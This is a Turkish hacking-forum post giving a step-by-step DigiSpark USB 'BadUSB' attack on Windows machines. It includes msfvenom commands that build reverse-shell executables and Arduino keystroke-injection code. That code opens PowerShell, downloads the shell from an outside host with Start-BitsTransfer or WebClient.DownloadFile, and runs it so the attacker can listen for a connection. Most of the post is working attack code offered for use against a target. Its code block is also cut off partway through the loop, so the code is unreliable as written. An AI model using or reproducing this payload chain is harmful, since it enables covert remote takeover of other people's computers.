Hoşgeldin Misafir

DigiSpark USB Exploit Windows Reverse Shell

Reisci

Reisci

Yerli Ve Milli Hacker
11 Mar 2020
6,569 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
Öncelikle Reverse Shell oluşturmamız gerekiyor

Not:Meterpreter kullanmıyacagım

x86 msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe
x64 msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe

Bu şekilde oluşturabilirsiniz

Şimdi oluşturduk var sayıyorum ve devam ediyorum

Bu shell imizi bir sunucuya atmamız lazım

Hedef cihaza indirmesi gerekiyor çunki

bunuda yaptık varsıyıyorum

Şimdi geldik Digisparka can vermeye


Aurdinoyu açıyoruz

Kod:
#define kbd_tr_tr
#include "DigiKeyboard.h"

void setup() {
// put your setup code here, to run once:

}

void loop() {
// put your main code here, to run repeatedly:
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.delay(100);
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
DigiKeyboard.delay(100);
DigiKeyboard.print("powershell");
DigiKeyboard.delay(100);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(1000); 
DigiKeyboard.print("Start-BitsTransfer https://www.testdeneme.ml/shell-x64.exe shell-x655.exe");
DigiKeyboard.delay(250); 
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(1000);
DigiKeyboard.print("exit");
DigiKeyboard.delay(250);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(250);
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
DigiKeyboard.delay(250);
DigiKeyboard.print("shell-x655.exe"); 
DigiKeyboard.delay(250);
DigiKeyboard.sendKeyStroke(KEY_ENTER);

for (;;) {
#define kbd_tr_tr

Buşekilde tr klavye desteği vermiş oluyoruz bunun için atılması gerekli dosyalar var google da aratırsanız kolay birşey hemen halledersiniz.

("Start-BitsTransfer https://www.testdeneme.ml/shell-x64.exe shell-x655.exe");
(hedef makine windows 7 ise bu komut çalışmaz)
DigiKeyboard.print("$WebClient.DownloadFile(https://www.testdeneme.ml/shell-x64.exe','shell-x655.exe')");
(Windows 7 için bunu kullanın)

Burası indirecegi dosya konumu https://www.testdeneme.ml/shell-x64.exe
Bu ise karşı taraftaki pc ye kaydedeceği isim shell-x655.exe

DigiKeyboard.print("shell-x655.exe");
Buraya kaydettiği ismi yazıcaksınız

Delay ları biraz arttırabilirsiniz istege baglı

Şimdi bunu digisparkınıza yukleyın

portu dinlemeye alın ve artık hazır